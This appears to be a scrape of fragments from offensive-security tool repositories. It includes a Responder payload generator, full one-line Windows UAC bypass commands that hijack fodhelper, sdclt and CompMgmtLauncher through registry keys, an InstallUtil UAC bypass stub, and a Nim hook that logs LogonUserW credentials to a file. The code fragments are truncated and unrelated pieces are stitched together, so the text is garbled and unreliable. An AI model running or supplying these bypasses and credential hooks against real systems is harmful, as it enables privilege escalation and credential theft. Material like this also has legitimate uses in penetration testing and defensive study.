This script generates a payload for use with Responder.
- Generate a payload with main.py
- Copy and paste the one-liner output into the WPADScript field of Responder.conf.
test@test:~$ python3 main.py --help
usage: main.py [-h] [-o OUT] cmd
#!/usr/bin/env python
import argparse
import http.server
import os

class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_PUT(self):
        path = self.translate_path(self.path)
        if path.endswith('/'):
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
Upon attempting to compile the code in the Github repo via the Visual Studio 2022 x64 developer console, I got the following errors:
cl.exe /EHsc /W4 /Fe:program.exe source.cpp /link Advapi32.lib Psapi.lib
source.cpp(34): error C2664: 'BOOL ConvertSidToStringSidA(PSID,LPSTR *)': cannot convert argument 2 from 'wchar_t **' to 'LPSTR *'
source.cpp(34): note: Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or parenthesized function-style cast
C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\shared\sddl.h(267): note: see declaration of 'ConvertSidToStringSidA'
source.cpp(34): note: while trying to match the argument list '(PSID, wchar_t **)'
source.cpp(68): error C2664: 'std::string wcharToString(wchar_t [])': cannot convert argument 1 from 'CHAR [260]' to 'wchar_t []'
source.cpp(68): note: Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or parenthesized function-style cast
reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f
reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f
C:\Windows\System32\ComputerDefaults.exe
// https://blog.eswlnk.com/9612.html/2
// https://github.com/iyzyi/Mua-Remote-Control-Trojan/blob/main/DOCUMENT.md
#pragma once
#include <Windows.h>
#include <objbase.h>
#include <strsafe.h>
**UAC bypass for Win10:**
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
**UAC bypass for Win10:**
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f
**UAC bypass for 7/8/10:**
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
if (-not ('TokenInformation.ProcessNativeMethods' -as [type])){
    $TypeDef = @'
using System;
using System.Runtime.InteropServices;
namespace TokenInformation {
    [Flags]
    public enum ProcessAccess {
        All = 0x001FFFFF,
        Terminate = 0x00000001,
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
#[
PoC for hooking advapi32!LogonUserW to log credentials
Patch and restore the function when called; original credit for 99% of the code is here: https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/Hook.nim
Log to a named pipe server (must be started/managed by a separate listener), and/or log to a file.
By default, just logs to C:\users\public\log.txt
Compile:
nim c -d=mingw --app=lib -d:release --nomain LogonUserSpy.nim